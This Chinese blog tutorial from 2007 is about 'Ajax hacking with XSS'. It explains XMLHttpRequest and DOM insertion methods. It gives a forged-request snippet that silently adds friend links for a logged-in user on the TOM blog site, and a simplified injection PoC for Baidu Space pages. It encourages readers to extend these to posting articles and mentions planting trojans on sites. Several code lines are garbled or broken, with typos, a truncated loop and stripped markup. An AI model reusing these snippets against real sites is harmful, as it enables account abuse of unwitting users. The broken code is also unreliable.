(作者)
2007-08-08 19:14
1
异步数据调用
既然是Ajax hacking,自然需要用到异步的数据调用。这里将简单的介绍一下相关的知识,要更 深入的了解是长期实践的结果。
1、声明xmlhttprequest对象
数据调用需要事先声明xmlhttprequest对象,在IE6及以前版本中最简单的做法是:
var XmlHttp=new ActiveXObject("Microsoft.XMLhttp");
在IE7和firefox中的声明方法是:
var req = new XMLHttpRequest();
所以如果我们想编出兼容性更好的代码,可以对客户端浏览器进行判断,然后分别定义 xmlhttprequest对象,如下:
if(window.XMLHttprequest){
XmlHttp = new XMLHttpRequest();
}else if (window.ActiveXObject){
Xmlhttp = new ActiveXObject ('Microsoft.XMLHTTP');
}
然后采用以下方法进行参数传递
XmlHttp.Open("POST","URL",true);
XmlHttp.send(null);
这里要主意的是,XmlHttp.Open中的第一个选项为页面的请求方式,可以为post、get、head三种 第三 个选项true表示异步方式、false表示同步方式。
利用以上代码,你可以简单实现一下在TOM博客中为当前用户添加任意用户的友情链接,如果添加 成功 会返回OK窗口,已经添加会返回friended,代码如下:
var XmlHttp=new ActiveXObject ("Microsoft.XMLhttp");
XmlHttp.Open("POST","http://blog.tom.com/manage/favorite/friend_list.php? UserName=monyer1&Flag=1",true);
XmlHttp.send(null)
XmlHttp.onreadystatechange=ServerProcess;
function ServerProcess(){
if (Xmlhttp.readystate==4 || XmlHttp.readystate=='complete')
alert (XmlHttp.responsetext); }
利用相同原理,给登录用户添加文章也不是什么难题,只不过稍微麻烦店而已,感兴趣的朋友可 以自 己回去试试。
V b s c r i p t 中声明xmlhttprequest的代码为这样:
dim httpreq as msxml.xmlhttprequest
set httpreq = new xmlhttprequest
httpreq.setrequesttheader "content- type:","text/xml;charest=gb2312"
httpreq,send
利用方式与js大体相同,这里不做过多的即时。
2、获取页面元素
获取页面指定标签和标签中的值一般会用到以下几个DOM对象,当然对象后面可以加入相关属性, 比如 style、value、innerHTML等等。
1)document. getElementByld //获得制定id的html标签相关信息
2)document. getElementByname //获得指定name的html标签相关信息
3)document. getElementByTagName //获得指定的html标签相关信息
3、在页面中插入html元素
我指导的可以在页面插入html的js函数有insertAdjacentHTML、innerHTML(outerHTML)、 inserAdjacentText、innerTEXT(outerTEXT)。其中前两个是插入html代码,后两个是插入文本,所以我们一般所用的 就是前两个。另外用document对象中的createlement也可以实现代码插入,输入js代码时 请注意大小写问题。
1) i am monyer' ">innerHTML //替换当前标签中的内容,作用域不包括当前的 html标签
2)i am monyer' ">outerHTML //替换当前标签及标签中的内容,作用域包括当前标签及其中所有内容
3)monyer')" href="#">insertAdjacentHTML //新增插入的html代码,不改 变原标签及内容
指定插入html标签语句的地方,有四种值用:
a.beforeBegin:插入到标签开始标记后
b.afterBegin:插入到标签开始标记后
c.beforeEnd:插入到标签结束标记前
d.afterEnd:插入到标签结束标记后
灵活地运用这两个函数能帮我们变换出丰富的效果来,我利用百度空间插入视频的简化POC:
Html页面的代码为:
src=http:/ /tv.mofile.com/cn/xplayer***?v=9IWKFISEmonyerflash.js代码为:
windwo.οnlοad=function(){
var i,j,x,y,z;
j=document.getElementsByTagName ('address');
for(i=0;i
y=document.getElementsByTagName('address') [i];
z=document.getElementsByTagName('address') [i]; firstChild.data;
x='';
if(y) y.insertAdjacentHTML('beforeEnd'.x);
}}
总结
有了以上概述,相信你对Ajax hacking with XSS已经有了一个大体的了解,并且只要把文中的响应内容进行简单的组合和更改,就很可能做出某些令人惊喜的东西。当然因为Ajax应用的是JavaScript的一部分,所以想充分利用Ajax式的hacking并发挥它的威力还需要你对JavaScript有一个充分的了解。当你在各个过滤系统间实战时,你会遇到更多的苦难并需要试着解决各种问题。我认为是否真正入侵一个网站或者顺利挂马是次要的,不断提高自己,在功与防的对立统一中不断寻求突破才是王道!